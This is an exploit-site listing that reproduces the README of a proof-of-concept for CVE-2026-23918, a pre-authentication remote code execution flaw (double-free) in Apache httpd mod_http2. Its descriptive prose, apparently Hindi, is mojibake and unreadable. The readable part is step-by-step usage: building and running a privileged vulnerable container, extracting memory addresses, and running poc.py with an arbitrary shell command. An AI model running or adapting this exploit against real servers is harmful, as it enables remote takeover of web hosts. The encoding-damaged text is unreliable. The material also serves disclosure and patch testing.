## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-STRIGA-AI-CVE-2026-23918
# CVE-2026-23918
Apache httpd mod_http2 рд╕реНрдЯреНрд░реАрдо рдХреНрд▓реАрдирдЕрдк рдореЗрдВ рдбрдмрд▓-рдлреНрд░реА рдЬреЛ рдкреВрд░реНрд╡-рдкреНрд░рдорд╛рдгреАрдХрд░рдг RCE рдХреА рдУрд░ рд▓реЗ рдЬрд╛рддрд╛ рд╣реИред
рдкреНрд░рднрд╛рд╡рд┐рдд: httpd 2.4.66 рдЬрд┐рд╕рдореЗрдВ mod_http2 рдФрд░ рдорд▓реНрдЯреА-рдереНрд░реЗрдбреЗрдб MPM (event/worker) рд╣реИред рдареАрдХ рдХрд┐рдпрд╛ рдЧрдпрд╛: 2.4.67 рдореЗрдВред
рдкрд╛рдпрд╛ рдФрд░ рд░рд┐рдкреЛрд░реНрдЯ рдХрд┐рдпрд╛ Bartlomiej Dmitruk (striga.ai) рдФрд░ Stanislaw Strzalkowski (isec.pl) рдиреЗред
рд╡рд┐рд╡рд░рдг: https://striga.ai/research/apache-httpd-mod-http2-double-free
## рдЖрд╡рд╢реНрдпрдХрддрд╛рдПрдБ
* Docker
* Python 3
## рдЙрдкрдпреЛрдЧ
рдХрдордЬреЛрд░ рд╡рд╛рддрд╛рд╡рд░рдг рдмрдирд╛рдПрдБ рдФрд░ рдкреНрд░рд╛рд░рдВрдн рдХрд░реЗрдВ:
root@kitploit:~
docker build -t httpd-poc .
docker run -d --name httpd-poc --privileged -p 9443:443 httpd-poc
`system()` рдФрд░ scoreboard рдкрддреЗ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ:
root@kitploit:~
docker exec httpd-poc python3 /getaddr.py 1
рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ рдЪрд▓рд╛рдПрдБ:
root@kitploit:~
python3 poc.py --host localhost --port 9443 \
--cmd 'date >> /tmp/win' --workers 64 \
--system <system_addr> --scoreboard <scoreboard_addr>